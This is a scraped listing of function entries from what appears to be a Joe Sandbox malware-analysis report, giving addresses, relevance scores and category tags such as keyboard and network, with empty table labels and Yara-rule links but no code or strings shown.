| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBCD0F8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB72998 Relevance: 7.6, APIs: 5, Instructions: 133COMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB31CEC Relevance: 7.6, APIs: 5, Instructions: 124keyboardCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB6BA2C Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB9D924 Relevance: 7.6, APIs: 5, Instructions: 91sleepwindowCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB6F9D4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBA2ED0 Relevance: 7.5, APIs: 5, Instructions: 37windowtimeCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBB0008 Relevance: 7.5, APIs: 5, Instructions: 33synchronizationthreadCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBB6D04 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 308comCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB70040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 205COMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB5B1E8 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 150COMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB9EAC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 127windowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBAA6BC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101windowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB6EAA8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBDB454 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBDAB9C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBDB798 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80windowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBB4DF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBDB104 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB9F5CC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64windowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBAC110 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58fileCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBCAF20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB36D64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBD10C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB36D1C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBA32F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB6C72C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBA8B38 Relevance: 6.1, APIs: 4, Instructions: 96keyboardwindowCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBA8CAC Relevance: 6.1, APIs: 4, Instructions: 89keyboardwindowCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBA50E4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBACF68 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB6B778 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
| APIs |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB6CC78 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBA1D10 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200comCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB6D0A8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB6A09C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBD9E08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBC5E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88networkCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBDB224 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB6DC30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBDA0C4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBD9868 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBD9BD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB6FD90 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB9DDF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB9DD48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB9DCA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBBE708 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47networkCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DBDFEA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB9DEA8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39windowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB715B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB714FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB714E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB71370 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 33COMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB9C59C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26windowCOMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB575C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|
Function 00007FF69DB55620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
Download Yara Rule
| APIs |
|
| Strings |
|
| Memory Dump Source |
|
|
| Joe Sandbox IDA Plugin |
|
| Similarity |
|